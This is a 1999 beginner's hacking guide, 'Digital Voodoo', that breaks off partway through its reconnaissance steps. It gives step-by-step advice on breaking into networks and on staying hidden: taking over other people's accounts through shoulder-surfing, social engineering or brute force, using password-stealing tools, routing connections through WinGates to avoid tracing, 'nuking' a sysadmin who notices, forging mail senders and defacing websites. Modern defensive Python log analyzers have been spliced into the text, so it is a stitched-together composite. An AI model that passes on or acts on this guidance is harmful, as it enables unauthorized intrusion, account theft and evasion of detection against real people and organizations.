Digital Voodoo
-= The craft of Hacking on the Internet =-
- Release 2.2 -
Kurruppt2k, 1999
kurruppt2k@mailcity.com
Related material and necessary programs available at The CyberUnderground
http://www.users.uswest.net/~kurruppt2k
Information Insemination
__________________________________________________
New in Release 2
Intro
Prerequisites
A little Hacker lingo
What you need - a Hacker's equipment
Keeping from getting caught
TCP/IP and the Client/Server model
Getting Started
I dub thee... "Hacker"
Unix
NT
Netware
"Unbelievable... a Hacker!"
Eleet Hacker Tactics
Firewall Penetration
In Summary
Appendix A - commonly used passwords / usernames
Appendix B - basic Unix commands
Appendix C - further reading
Appendix D - well known UDP and TCP ports
__________________________________________________
New in Release 2
Why a second release so soon? Well, the first release was written in very little time. I put Digital Voodoo out on TCU (The CyberUnderground) immediately after it was finished. Soon after, having read it over a few times, I decided that, though informative and broad, the text was still missing a little. For the most part I left what I had alone, but I did add a few sections. Since so many copies had already circulated in such a short amount of time, rather than just updating it and reposting it on my site, I decided to just call it a second release. Penetrating Firewalls is a brand new section, and offers valuable info to those who aren't complete newbies. I also added a lot of useful NT break-in tactics to the NT section, and more useful info was included in the Unix section as well. A few more appendices were added too. All in all, release 2 (now 2.2!) is quite a bit more full of content than its predecessors. By the way: I wrote this with Windows WordPad, which you all know doesn't have a spell checker. Deal with it. So sit back, crack open a can of Jolt Cola, and dig in.
About the Author
My name is Kurruppt2k. Occasionally, I've gone by the handles (\/)3n4c3 (\/)n3m0n|c and | )igi741 Vood00 (hence the title of this text). As of the writing of this second edition, I'm 19 years old, and in college for a degree in Network Support. I absolutely love computers, networks, TCP/IP and internetworks, and therefore the Internet (not the WWW). Though a bit immature and overquoted, I believe in most of the Hacker Manifesto (if you've never read it, now would be a good time to do so). Information, in my humble opinion, is hoarded and safeguarded. The biggest advances the technological world has made were due to people willing to share their ideas and informational resources with others. Take Linux and GNU, for example (if you are unfamiliar with GNU... you ought not be). I, as a hacker, don't wish to wreak havoc, crash systems, deface websites, or prove my 'leetness' to my friends by breaking into systems. I like to be pitted in a match of wits, to use my head and knowledge of computers and networks to circumvent traditionally impenetrable systems. I want to know what's out there, and why it's so secretive. I want that euphoric feeling of understanding exactly how a certain system works. Lots of people become hackers (or attempt to) for all the wrong reasons. The desire to deface someone's website will not usually be motivation enough to accomplish the task. Only an insatiable curiosity will drive you to obtain whatever goal you set for yourself. Cliche, but true.
Intro
The reason I wrote this is that there are a vast number of "hacking for newbies" texts available on the Internet, most by very knowledgeable individuals. However, they all (to the best of my knowledge) cover dial-up hacking only. To explain what I mean by that, let me categorize the various means by which a hacker gains access to a computer, supermini, mainframe, etc. into three distinct genres. There's the obvious on-site access, which is as simple as being on the premises of the system in question. There's dial-up access, which is simply using a modem to dial into another modem, and going from there. And finally, there's what I will hereafter refer to as IP access. In short, this means accessing a system via the Internet. On-site hacking (relatively unfeasible in most cases) is usually covered briefly in most of the readily available texts out there, though they mostly focus on dial-up hacking. The idea of connecting to a computer elsewhere with a modem has been around a long time, and so has the dial-up access method of hacking. But the Internet, having only been around for about 30 years, has not been a widely used method of access. Until recently. Actually, it hasn't been that recent, so why a guide to hacking on the Internet hasn't already been written is beyond me. That is the primary focus of this text. Take any computer or network of any potential target of yours, and most likely it is connected to the Internet. Which means you, as an Internet-hacker-to-be, can break into it. This is very good for people like us, because finding a computer or network on the Internet is much easier than finding a modem number (I'll explain how later). One last thing before we get into the actual hacking stuff: this text will not teach you to be a hacker, nor will any text out there or any collection of texts. Hacking is a self-taught craft, meaning you will need the dedication to go out and find materials on your own. If you have a specific question, go ahead and ask someone on a hacker IRC channel or whatever, but if your question is too broad ('how do I hack into a Netware box?') you will be ridiculed and labeled a lamer. Keep your questions technical in nature ('what's the SMTP command to set the recipient?'), and most will be happy to share their knowledge with you. Once you've completed this text, I suggest you play around with what you've learned (as 80% or so of what you learn will come from hands-on experience). Next you will need some material on topics just glazed over in this text. Get yourself a UNIX book (UNIX for Dummies, Teach Yourself UNIX in 24 Hours, whatever). Then get yourself a book on Windows networking. These are also readily available. Other books you should have in your collection are general hacking books. The book Maximum Security is very informative, as is Secrets The Happy Hacker. Secrets of a Super Hacker, Steal This Computer Book, and the New Hacker's Dictionary are at least worth checking out at your library. If all this seems like too much work, well then you probably lack the dedication to become a hacker. If you're still eager to learn - great! This text will point you in the right direction. So, without further ado - on with the hacking!
Prerequisites
First of all, let me say that it is assumed that the reader of this text already has a basic working knowledge of computers and the Internet. Not extensive, by any means. This text is targeted at people who probably have their own computer (or ready access to one), surf the web, and have always wanted to know what exactly hacking was all about. If you start reading and find yourself lost, put this down and go get yourself a basic book on computers and the Internet before you delve into this. For example, it's assumed that you already know what a URL is (eg: http://www.hackers.com/archives). This really goes without saying, but I, as the writer of this text, take no responsibility for the actions of those who act based upon principles learned by reading this material. Really, this is intended to inform anyone who's always wondered how exactly these "hackers" they hear so much about do what they do, and concerned system administrators who want to know how hackers can infiltrate their network. Okay, anyway, on to the good stuff.
A little Hacker lingo
I'll get the jargon out of the way now, in case I refer to one of these terms later.
Hacker - one who infiltrates and explores various computer systems for the sole purpose of expanding their knowledge and satisfying their insatiable thirst for information.
Cracker - a hacker who acts maliciously. Deletes, crashes, implements viruses, etc.
Warez d00d - a lowlife techno weenie who sells pirated software (basically people who couldn't quite make it as a hacker).
Eleet, leet, el33t, 31337, etc - a hacker who's learned just about everything there is to know regarding computers, networks, and security (not really possible). Many claim to be leet, very few are.
Newbie - an amateur hacker (different from a lamer).
Lamer - a complete hacker wannabe. The difference between a newbie and a lamer is this: a lamer knows a little bit, decides that's enough, and calls himself a hacker. A newbie also knows a little bit, but is humble enough to know that there is a lot more to be learned.
Root - status on any system that gives the hacker total control of it. Usually, root is the desired end result of any hack.
Rootshell - a shell is an interface between you as a user and a particular computer. Windows Explorer is a shell, DOS prompts are a shell. If you log into a UNIX machine, you are using a shell. So a rootshell is a shell with root (superuser) privileges to resources on that machine. You can obtain a rootshell by either logging into the box as root (assuming you have the password) or by using an exploit program to create a rootshell for you (more on this later).
Packet - when data is sent over a network, it is broken down into manageable chunks called packets. This isn't always the case, but in TCP/IP (the protocol used on the Internet), this is always true.
Protocol - a set of rules and guidelines that computers on a network must follow in order for communications to be coordinated, and therefore successful. A protocol defines specifically how data is broken into packets, sent over a wire, and reassembled at the other computer (and how sessions are set up over a network).
Client - Usually refers to either A: a computer on a network that requests resources from a server, or a computer that is not a server; or B: a program that makes requests of a server or service. Netscape Navigator and Internet Explorer are client software programs in that they request web pages from servers.
Server - Either A: a computer set up to share resources such as printers or files, or to serve web sites, or B: a program used to fulfill requests, such as IIS (Microsoft's Internet Information Server). More on clients and servers later.
Proxy Server - Okay, if a company has its own network and its own website, there will be a portion of the network accessible (with a username and password, of course) by anyone with Internet access. All the HTML files for the company's website will be somewhere on this segment of the network. Then, there will be the portion of the network strictly for business purposes, hidden from the rest of the world. A proxy server (along with sometimes a firewall) separates these two segments. So if you want to access the restricted part of any network, you will need to do it via the proxy server. Also, if all the workstations in an office have Internet access, they most likely do so through the proxy server.
Firewall - Sort of like a proxy server, but has no other purpose but to keep unauthorized users out. Even if you have a valid username and password for a system - if a firewall is in your way, you're pretty much out of luck. Hacking through one is next to impossible. Hacking around one is slightly easier (more on this later).
What you need - a Hacker's equipment
Here is a basic list of the hardware, software, and other miscellaneous things you will need to begin your days in the world of digital espionage.
· A computer (duh) with some kind of Internet access, be it PPP, a T1, or whatever (more on this later).
· One, preferably two accounts with an ISP, your phone company, or whatever. One should be in no way, shape or form attached to you (ie: someone else's account!). More on this later.
· The following software:
An Internet browser (Netscape Communicator, Microsoft Internet Explorer, whatever).
A telnet client (comes with most UNIX systems, Windows 95/98/NT/2000).
An FTP client (comes with most UNIX systems, Windows 95/98/NT/2000).
A ping utility (comes with most UNIX and Windows products, I believe).
An IP scanner.
A port scanner.
A sharescanner.
A finger client.
A whois and lookup utility (though this can be done on the Web).
A traceroute utility (comes with most Windows products, I believe).
A password cracker.
A brute force engine of some sort (this you can make yourself).
Sound complicated already? It's really not - I'll explain the function of each shortly. First, I'll list some effective programs for each. Browsers (actually, not that important to a hacker) are pretty commonplace. As far as a telnet client, if you have any UNIX system (BSD, System V, Linux, or whatever) or Windows 95 or above, you most likely have one. Do a search for 'telnet.' Otherwise, grab a copy from a friend - it's pretty common. Most computers come with some sort of FTP client as well - in either UNIX or at a DOS prompt type 'ftp' and it should come up. Otherwise, get it from a friend (most have it, even though they might not have heard of it). Ping utilities are as common as telnet and FTP. Type 'ping' at a UNIX or DOS prompt. The later versions of Netscape and MIE have an FTP client built in, but they are pretty limited. Now the various types of scanners are a little harder to find, as they aren't used for much besides hacking (or attempting to hack). HakTek is an oldie but goodie - it has an IP scanner, a port scanner, a ping utility, and a finger client (and even an email bomb utility, if you're into that sort of thing). WS Ping ProPack (a legitimate program, believe it or not) is a great piece of software. It has an IP scanner, a port scanner, a ping utility, a finger client, whois and lookup utilities, traceroute, and a variety of other possibly useful utilities. I seriously suggest that you download the evaluation version at http://www.ipswitch.com. Traceroute is also integrated into (I believe) Windows 95 and above. Type 'tracert' at a DOS prompt. Legion is a pretty good sharescanner, and I'm told Winhack Gold is decent (for UNIX). Now as far as password crackers go, there are a lot. What you need all depends on what platform (operating system) you have, and the platform of the computer that the password file belongs to. If you have any flavor of UNIX and are cracking a UNIX password file, get Cracker Jack. If you have a Windows product and are cracking a UNIX password file, get John the Ripper. If you have a Windows product and are hacking an NT Server (or any other Windows machine) get Lopht Crack. Finally, the brute force engine. Simply a program designed to spit out words from a dictionary file (or a range of numbers) into a login/password prompt, used by hackers in hopes of finding a valid username/password combo. The problem with pre-made BF engines is that there are almost unlimited combinations of login screens (as far as in what order, 'group,' or related login prompts, number of attempts before disconnection, etc), so you are usually better off writing your own. If you have absolutely no programming experience, well, now's the time to learn a little. This isn't nearly as tough as it may seem, as I'll discuss later. One more program you might want to look into is a nuking program of some kind (WinNuke, Bitch Slap, anything). These come in handy in basically two instances (unless you just like to cause trouble - in which case you are considered a 'cracker,' not a hacker). You may, in your explorations, run into a not-so-friendly hacker, who feels threatened by your attempting to move in on his territory (Acid Burn in Hackers). Nuking programs allow you to 'nuke' an IP address, and you can usually find out the IP address of anyone logged on to a certain system. So if you are being threatened by a cracker somewhere - nuke 'em! The other instance where this utility comes in handy is if you get caught red-handed hacking by the system's administrator or operator, and he becomes hell-bent on finding your actual location. Nuke the computer you were on or the network's proxy server, to slow him down, and disconnect as soon as possible. Please, though, don't go around nuking everything because you are getting frustrated. This is very lamer-like, and will get you busted much quicker than breaking into the system. Now to turn your UNIX or Windows machine (or even Mac, I suppose) into a mean h4x0r b0x, you should go about the Internet and download at least one of each of these. Make one of the first options on your start menu something like 'hacker utilities', and have a shortcut to each program on that menu, for quick access.
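The brute force engine described above is something a sysadmin sees from the other side as a burst of failed logins. Here is an added example (not from the original text) of checking a login log for it: Python over a few constructed log lines in an assumed format, flagging any source that fails more than a set number of logins inside a sliding time window, and noting a success that follows such a burst.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines (not from any real system). The format,
# "YYYY-MM-DD HH:MM:SS <source ip> <login name> <FAIL|OK>", is an assumption
# made for this example; real login logs look different.
SAMPLE_AUTH_LOG = """\
1999-03-01 02:14:01 203.0.113.7 root FAIL
1999-03-01 02:14:02 203.0.113.7 admin FAIL
1999-03-01 02:14:02 203.0.113.7 guest FAIL
1999-03-01 02:14:03 203.0.113.7 ftp FAIL
1999-03-01 02:14:03 203.0.113.7 test FAIL
1999-03-01 02:14:04 203.0.113.7 guest OK
1999-03-01 02:30:00 198.51.100.4 alice FAIL
1999-03-01 02:45:00 198.51.100.4 alice OK
1999-03-01 03:00:00 192.0.2.9 bob FAIL
1999-03-01 03:20:00 192.0.2.9 bob FAIL
1999-03-01 03:40:00 192.0.2.9 bob FAIL
1999-03-01 04:00:00 192.0.2.9 bob FAIL
1999-03-01 04:20:00 192.0.2.9 bob FAIL
"""


def parse_auth_line(line):
    """Return (timestamp, src_ip, user, ok) for one line, or None if malformed."""
    fields = line.split()
    if len(fields) != 5 or fields[4] not in ("FAIL", "OK"):
        return None
    try:
        ts = datetime.strptime(fields[0] + " " + fields[1], "%Y-%m-%d %H:%M:%S")
    except ValueError:
        return None
    return ts, fields[2], fields[3], fields[4] == "OK"


def find_bruteforce(log, max_failures=5, window_seconds=60):
    """Flag sources with at least `max_failures` failed logins inside a sliding window.

    Returns {src_ip: {"failures": peak failures seen inside one window,
                      "users": sorted distinct login names tried,
                      "success_after_burst": the login name that succeeded while
                                             the source was over the threshold, or None}}.
    A slow trickle of failures hours apart (192.0.2.9 in the sample) never fills
    a one-minute window, which is why the window size is a tuning decision.
    """
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # src_ip -> timestamps of failures still in the window
    users = defaultdict(set)      # src_ip -> login names it has tried
    flagged = {}
    for line in log.splitlines():
        rec = parse_auth_line(line)
        if rec is None:
            continue
        ts, ip, user, ok = rec
        q = recent[ip]
        while q and ts - q[0] > window:   # drop failures that fell out of the window
            q.popleft()
        if ok:
            # a success right after a burst is the case worth a closer look
            if ip in flagged and len(q) >= max_failures:
                flagged[ip]["success_after_burst"] = user
            continue
        q.append(ts)
        users[ip].add(user)
        if len(q) >= max_failures:
            entry = flagged.setdefault(
                ip, {"failures": 0, "users": [], "success_after_burst": None})
            entry["failures"] = max(entry["failures"], len(q))
            entry["users"] = sorted(users[ip])
    return flagged


if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, info)
```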
Keeping from getting caught
Hacking is a grey area, as far as what exactly is legal and what exactly isn't. Even if you follow the hacker code of ethics (never harm), you are still quite possibly breaking one or more laws. Let me just say that if you are already on a system with someone else's login name and password, you are blatantly breaking a few laws. Nuking is also illegal. IP and port scanning are not illegal, though they definitely cause suspicion. In the past, measures to keep oneself safe included hacking from payphones, splicing your neighbor's line, 'bouncing' your call (explained later), and even using programs such as Modem Jammer. Now, you should use one or more of these methods to keep from being physically traced, and another to keep from being traced over the Internet (to your ISP). The best and probably easiest way to do this is to use someone else's account, preferably on a different ISP. This is much easier to do than one might expect. Shoulder-surf someone typing in their login/password, do a little social engineering (explained later), or even brute force to get a valid account. There are even programs out there that, if run on a machine used to access the Internet via a dial-up (with an ISP), will give you the password. One such example is Dripper (available at The CyberUnderground). As far as physically tracing you goes, if you are using someone else's account you are sort of safe. If you have hacked into a system with a low-level account (a 'guest' account, for example) and just got yourself root (see definition above), you should seriously consider adding a few methods of security before reconnecting. To hack from a payphone, get an acoustic coupler for your modem, set the receiver on it, and just dial out. Bouncing your call means basically calling a modem somewhere that is designated as an 'outdial', meaning once connected, any modem commands you issue will go to it, so you can dial from it to somewhere else. If you are traced, it will be to that modem. This can be defeated though, so it's a good idea to bounce calls off a few outdials. Outdials are pretty hard to find, but are most common on X.25's and other PSN's (for more info on outdials, read any other hacking text, like "The Neophyte's Guide to Hacking" or "The Newbie's Handbook").
Another security method (similar to bouncing your call) is bouncing your IP attack. Meaning: telnet to a system that supports telnet itself, then telnet from it to your target. Finding and obtaining access to one of these is difficult for a new hacker, so I'll go into greater detail on this later. Another effective method of avoiding having your IP address logged by the system you're connected to (and thereby getting "busted") is bouncing your packets off a WinGate host. WinGate is a server software program that acts kind of like a proxy server and firewall all in one (see above for definitions). As with a generic proxy server, all computers in the office that the WinGate computer is in connect to it to get to the Internet - and you can do the same. All you need is the IP address or domain name of a WinGate host. Telnet to it, and type the IP address you want to get to at the prompt you get. The IP address of the WinGate box will be logged as you connect - not your own. Finding WinGates is very easy - just go to any hacker website (www.cyberarmy.com is a good one) and look at their database of WinGates. You'll have to weed through lists of bad WinGates though, so you may be better off getting a WinGate scanner and doing it yourself. If you're really smart, you'll bounce your packets off a few WinGates before getting to your target.
As a rule of thumb, the amount of security you should be using is directly related to the seriousness of your hack. Though, you could be
breaking many federal and state laws without even being close to having root access, and not even quite sure what you are doing. It
cannot be stressed enough: be as safe as possible.
TCP/IP and the Client/Server model
Transfer Control Protocol/Internetwork Protocol. The 'language,' or means by which packets are exchanged over the Internet, or any intranet. TCP/IP is nothing more than a set of rules and regulations that specifically define exactly how data is transferred between computers on a network. This protocol has several sub-protocols, known collectively as the TCP/IP protocol suite. To utilize any of these subprotocols, you just need a client for it. For example, Windows 95 and above has a built-in FTP and telnet client (a client, when referring to a protocol, is a program that lets a user utilize that protocol). In this section I will explain each of these subprotocols, and other protocols used over the Internet.
One concept that it is imperative you understand is the Client/Server model. Every protocol is utilized with software. For example: HTTP (Hyper Text Transfer Protocol, the protocol used to transfer HTML web pages to and from your computer [this is why it is at the beginning of the URLs you visit]). This protocol is put to use by software. This software has two pieces, a client side and a server side. When you type in a URL or click on a link, you are using an HTTP client software program (a browser) to request a copy of a particular web page. Then, the server of the URL you requested has HTTP server software that receives the request (in the form of packets) and provides you with a copy of the page by sending it back to your computer. A server side software package is also called a service, and is accessed via ports. A port is a "virtual channel" used to transfer packets of a specific protocol between a client and a server. When you hear the term 'portscanning,' what is being referred to is scanning for protocols, or services. Also, each port (service installed on the server in question) has a number assigned to it (eg: telnet is generally number 23). At any rate, think of client side software as the requestor, and the server side software as the provider.
PPP. There are many protocols, most of which discussed here are used over the Internet's high-speed digital lines. However, there are lots of protocols used over regular analog phone lines, used before the Internet was a major computing tool. These include Kermit, Xmodem, Ymodem, etc, and all have parallels in the TCP/IP protocol suite. However, the only "analog phoneline" one I'll cover is PPP. PPP (Point to Point Protocol) is the protocol used to connect to your ISP's server, which in turn sends and receives TCP/IP packets over the Internet for you. SLIP is similar, but not as effective or as widely used. Basically, the way you are able to communicate with the digital network of the Internet is that your ISP translates TCP/IP packets to PPP so they can travel over phone lines, and vice versa.
Telnet. Let's start at the basics - on, say, a UNIX platform, there are one or more UNIX boxes - the computer that does the processing and holds all the data (files, applications, the OS, etc), which is the computer on the network that you are most likely trying to hack into. Then there are a slew of dumb terminals directly connected to it. A dumb terminal consists of nothing more than a monitor and a keyboard; everything a user types/does on a dumb terminal is handled by the UNIX box. Now, telnet is a protocol/application that allows people to connect to a computer remotely (over a phone line or the Internet) and process data locally - meaning when you connect to a UNIX box via telnet, it is just as if you were at a dumb terminal directly connected to the UNIX box. Telnet is the protocol you will be using to access the computer you are hacking into.
FTP. File Transfer Protocol. This is the protocol used to transfer files between computers over the Internet. Whether you are downloading password files or uploading changes to their HTML files, you will do it through FTP. To start an FTP session, you need to log in to the service with an FTP client, just as you would with telnet. More on this later. Incidentally, the later browsers from Netscape and Microsoft have an FTP client built in. To use it, type 'ftp' instead of 'http' in your browser.
SMTP. Simple Mail Transfer Protocol. This is the protocol used to send and receive email. If you connect to an SMTP port (by telnetting into it) you can issue SMTP commands. When you send an email, along with the actual letter goes its protocol. This means that the SMTP packets (made up of your letter and other protocol-specific data) connect to port 25, and issue the appropriate commands to the SMTP service in order for the letter to reach its recipient. You can also connect to this port and issue these commands manually. One use of this could be sending email and changing the sender address to someone else (possibly the recipient's employer). Also, with the VRFY command, you can find out whether or not a particular account (login name) exists on the network in question. Use the HELP command to familiarize yourself with the various SMTP commands.
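An added example, not part of the original text: the VRFY probing and the forged sender address just described both leave traces in a mail server's command log, and the Python below checks for them over a few constructed lines in an assumed log format (real servers log differently, so the parser is the part you would adapt).

```python
import re
from collections import Counter

# Constructed sample lines (not a real server's log). The format,
# "HH:MM:SS <client ip> <SMTP command> [argument]", is an assumption for this example.
SAMPLE_SMTP_LOG = """\
10:00:01 203.0.113.7 HELO scanner.example
10:00:02 203.0.113.7 VRFY root
10:00:02 203.0.113.7 VRFY admin
10:00:03 203.0.113.7 VRFY webmaster
10:00:03 203.0.113.7 EXPN staff
10:00:04 203.0.113.7 VRFY jsmith
10:00:10 198.51.100.4 HELO mail.partner.example
10:00:11 198.51.100.4 MAIL FROM:<bob@partner.example>
10:00:11 198.51.100.4 RCPT TO:<alice@target.example>
10:00:20 203.0.113.9 HELO x
10:00:21 203.0.113.9 MAIL FROM:<ceo@target.example>
10:00:21 203.0.113.9 RCPT TO:<alice@target.example>
10:00:30 192.0.2.5 MAIL FROM:<>
10:00:40 10.0.0.12 MAIL FROM:<alice@target.example>
10:01:00 192.0.2.5 VRFY alice
"""

LINE_RE = re.compile(r"^(\S+) (\S+) ([A-Z]+)(?: (.*))?$")
ADDR_RE = re.compile(r"<([^>]*)>")   # the address between angle brackets


def parse_smtp_line(line):
    """Return (timestamp, client_ip, command, argument) or None for a malformed line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, ip, cmd, arg = m.groups()
    return ts, ip, cmd, arg or ""


def find_enumeration(log, threshold=3):
    """Count VRFY/EXPN commands per client; return {ip: count} for clients at or
    above `threshold`. One VRFY may be innocent; a run of them is account probing."""
    counts = Counter()
    for line in log.splitlines():
        rec = parse_smtp_line(line)
        if rec and rec[2] in ("VRFY", "EXPN"):
            counts[rec[1]] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


def find_spoofed_senders(log, local_domain, internal_ips):
    """Return (ip, sender) pairs where a client outside `internal_ips` claims a
    MAIL FROM address in our own domain, i.e. mail pretending to come from inside."""
    hits = []
    for line in log.splitlines():
        rec = parse_smtp_line(line)
        if not rec or rec[2] != "MAIL":
            continue
        ip, arg = rec[1], rec[3]
        m = ADDR_RE.search(arg)
        if not m:
            continue
        sender = m.group(1)
        if "@" not in sender:           # null sender <> (bounce messages) has no domain
            continue
        domain = sender.rsplit("@", 1)[1].lower()
        if domain == local_domain.lower() and ip not in internal_ips:
            hits.append((ip, sender))
    return hits


if __name__ == "__main__":
    print("enumeration:", find_enumeration(SAMPLE_SMTP_LOG))
    print("spoofed:", find_spoofed_senders(SAMPLE_SMTP_LOG, "target.example", {"10.0.0.12"}))
```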
HTTP. Hyper Text Transfer Protocol. This, again, is the protocol used to transfer HTML pages back and forth between two computers.
Finger. This protocol (also a UNIX utility) is used to obtain information about users on a remote machine. With a finger client, you can see who's logged on currently, and can find specific information about a specific user.
DNS. Domain Name Service. If a computer has this port open, it generally means that this particular computer is a domain server of that
network (the spokesperson, if you will). If you were to telnet to a network/domain, and didn't specify a computer (eg: hackers.com,
instead of comp3.hackers.com) you would by default be connected to one of the name servers of that network.
NBT. This stands for NetBIOS over TCP/IP, and is what Windows networks use. Another name for this is 'nbsession,' which generally
indicates NetBIOS used over a Wide Area Network (such as the Internet), being that NetBIOS by itself (without TCP/IP) cannot be used
over a WAN.
SNMP, UDP, ICMP, SMB, NetBEUI, POP. These, along with many other protocols are used regularly over the internet as well. It is not
in the scope of this text to explain them all, so I encourage you to research them and the others I've covered in more detail.
Getting Started
Okay - you've found the network/system that you want to hack. What's first? Find out which of these protocols the target supports. Can you telnet to this computer? Can you FTP to it and copy files from it? To find out, you will need to run a portscan on it with your portscanning utility. Just type in the URL or IP address of the machine in question, and start scanning. You will be shown what protocols (TCP/IP subprotocols and others) the target has. It will not, however, tell you that it supports TCP/IP, because, to put it simply, it has to have TCP/IP to be on the Internet. What you are looking for here is services - these TCP/IP subprotocols and other services/ports. Do not let the term port mislead you - we're not talking about physical ports.
Now, if the portscan indicated that the target machine supports telnet (port 23), you can telnet to it and attempt to log in. Go ahead - try it. You'll need a valid username/password combo to get in, which we'll get to later.
If port 21 is open, that means that the machine supports FTP, and files can be transferred back and forth from it. But, like access via telnet, you'll need a login name and password. A default "anonymous" account is ftp/ftp for a username/password, so go ahead and try that. If this works (and don't be surprised if it doesn't), you won't have much in the way of access privileges (meaning you'll be able to look at files, but usually not copy files to your computer, and most likely not copy files to it). If you can anonymously log on, you at least have your foot in the door, and can possibly use this as a stepping stone to get further into the system. More on this later. Once logged on via an FTP port, the commands to jump around from directory to directory and copy files are very DOS-like (actually more UNIX-like than DOS, but if you know a little DOS, you should feel comfortable navigating the system). Type 'help' or '?' for a list of commands. When you do this, you are accessing a help file on your computer. To access the help file on the computer you're on (which is usually more extensive and has commands specific to the computer you're logged on to) type 'rhelp' or 'remotehelp,' or something similar. Or you could telnet to the FTP port and type 'help.' FTP is the only way to transfer files between the target computer and yours - which you will need to do to get password files, change their website ('this site has been hacked by Kurruppt2k'), or whatever. More on this later. One last note on FTP: you can telnet to an FTP port, and log in. However, since you are not using an FTP client, you will not be able to do much once inside (like get directory listings or download files) because your telnet program does not follow the rules and guidelines (protocol) specified in FTP. In fact, you can telnet to any port, but if the right commands are not issued (usually done by your client program), you may not get anywhere, and may even be disconnected. Telnetting to ports that you aren't sure about, though, is a very good way to learn about the computer you are targeting, and is usually necessary to break in.
Now, if your portscan turned up either 'www' or 'http,' that means that you've found the computer that has all the HTML files (website files) that make up this organization's website. This really is only relevant if you are attempting to break into the target's website. To do so, you'll need access to the index.html file (usually only accessible to superusers, or root accounts), and will have to FTP up the page you will replace theirs with, and replace index.html with your own. Doing this, though, could be considered cracker-like, and slightly malicious. This also tends to piss sysadmins off, and may drive them to attempt to find you - so be careful!
A last few notes on TCP/IP. You need to understand the structure of a URL, and of an IP address. Every computer on the Internet is
designated by an address. The addressing scheme (IPv4) looks something like this: 38.233.203.2. Generally, the very last number is the
node address, or the computer's address. The second to last is the subnet address. Each number between the decimals (called an octet)
can be from 0 to 254. So the IP address is in the 38.233.203 subnet. The last number, again, specifies the computer in that subnet. So if
you wanted to see what other machines were on that subnet, you would scan from 38.233.203.0 to 38.233.203.254. Now, each IP address
can also have a name. If 38.233.203.2 belongs to the netscape.com domain, it might be www.netscape.com, or mail.netscape.com, or
something similar. So when you type www.netscape.com to visit its website, you could also type http://38.233.203.2 (assuming that was
its IP address). Which brings us to URLs. Here is a typical "web address": http://www.microsoft.com/services/windowsNT.
The http:// specifies the protocol used. You could also replace it with ftp:// or even telnet://. (Note: to log in via ftp with your browser,
use ftp://username:password@www.yourtarget.com.) The www.microsoft.com is just the computer name. The DNS protocol handles
resolving the name into an IP address. The /services/windowsNT is the path to the file you are requesting (index.html, if none other is
specified), just like a path on your computer (with forward slashes instead of backslashes).
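The two address forms just described, taken apart in code. This is an added example, not part of the original text: it splits a dotted-quad address into its octets, checks whether two addresses sit in the same subnet, gives the host range of a subnet, and breaks a URL into scheme, host, path and any embedded credentials. The prefix_len parameter is an assumption that generalises the "first three octets" rule to any CIDR prefix; the sample addresses are constructed. Note what parse_url shows for the ftp://username:password@host form: the credentials are ordinary parts of the URL, so they end up in proxy logs, browser history and referrer headers like any other part of it.

```python
# Added example (not from the original text): pulling apart the two
# address forms described above, a dotted-quad IPv4 address and a URL.
# The sample addresses used here are constructed for illustration.
import ipaddress
from urllib.parse import urlsplit


def split_octets(addr):
    """Return the four octets of an IPv4 address as integers.

    ipaddress.IPv4Address rejects anything that is not four numbers
    separated by dots within the allowed range, so malformed input
    raises ValueError instead of silently producing nonsense.
    """
    return [int(part) for part in str(ipaddress.IPv4Address(addr)).split(".")]


def same_subnet(addr_a, addr_b, prefix_len=24):
    """True when both addresses share the same network prefix.

    The text compares the first three octets (a /24, the old 'class C'
    size). prefix_len is an assumed parameter that generalises this to
    any CIDR prefix; a class C that has been subdivided further is just
    a prefix_len larger than 24.
    """
    net = ipaddress.ip_network(f"{addr_a}/{prefix_len}", strict=False)
    return ipaddress.IPv4Address(addr_b) in net


def subnet_range(addr, prefix_len=24):
    """Return (first_host, last_host) of the subnet containing addr.

    For a /24 this is .1 through .254: the .0 and .255 addresses are
    the network and broadcast addresses, not hosts.
    """
    net = ipaddress.ip_network(f"{addr}/{prefix_len}", strict=False)
    hosts = list(net.hosts())
    return str(hosts[0]), str(hosts[-1])


def parse_url(url):
    """Break a URL into the pieces the text names: scheme, host, path,
    plus any credentials embedded as scheme://user:pass@host/.

    An empty path means the server will send its default document
    (index.html in the text's example), so it is reported as '/'.
    """
    parts = urlsplit(url)
    return {
        "scheme": parts.scheme,
        "host": parts.hostname,
        "path": parts.path or "/",
        "username": parts.username,
        "password": parts.password,
    }


if __name__ == "__main__":
    print(split_octets("38.233.203.2"))
    print(same_subnet("253.87.8.3", "253.87.8.45"), same_subnet("253.87.8.45", "253.87.11.12"))
    print(subnet_range("253.87.8.45"))
    print(parse_url("ftp://username:password@www.yourtarget.com"))
```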
I dub thee... "Hacker"
Okay, you now should have enough preliminary knowledge to start your very first hack. Pick a target. Universities usually have somewhat
lax security. Pick something relatively easy for your first time. Stay away from government networks and those belonging to large
businesses and corporations. The very first step is finding the domain name of your target. If your target is www.spicegirls.com, the
domain name is simply spicegirls.com.
Step one. Every successful hack starts with a little preliminary investigation. The more information you have about a specific domain,
the better armed you are. Open a notebook and start an "info collection" on your target. First, visit their website. Try to view every page,
and write down anything of importance. Copy down all email addresses - as these are also usually valid login names. Write down
anything else of relevance. Next run a whois or nslookup on the domain, with your appropriate utility (available at The
CyberUnderground). This will give you very useful information. You'll get the domain's nameservers, the administrator, a few more
email addresses, other computers on the network, and other useful stuff. Copy everything down. Another trick is sending an email to the
domain with a username that you know doesn't exist (eg: blablabla@yourtarget.com). The SMTP service of whatever server is designated
as the primary mail server of that network will return a letter to you saying that there is no such user. In the header of this email will also
be some useful information - copy it all down.
Step two. Next you should try to get a scope of what kinds of computers are on the outside of this network (by outside, I mean what
machines are "on the Internet," and not behind a firewall or proxy server). To do so, you will scan the subnet with your trusty IP scanner.
Again, a subnet is every computer (numbers 1 through 254) on a particular range of IP addresses. For example, 253.87.8.3 and
253.87.8.45 would be on the same subnet, whereas 253.87.8.45 and 253.87.11.12 are not. (Actually, class C subnets are oftentimes
broken up even further - read an RFC on IP to learn all about IP addressing, packet structure, etc.) To scan the subnet of your target, do as
follows. Ping the hostname (your computer should have a ping utility, as do most of the hacker programs you should already have). This
will give you the IP address of the domain's primary name server (as would a lookup or whois). If the IP address is 253.87.8.45, scan the
entire subnet, which would be 253.87.8.1 through 253.87.8.254. This will tell you every computer on that subnet - their IP addresses and
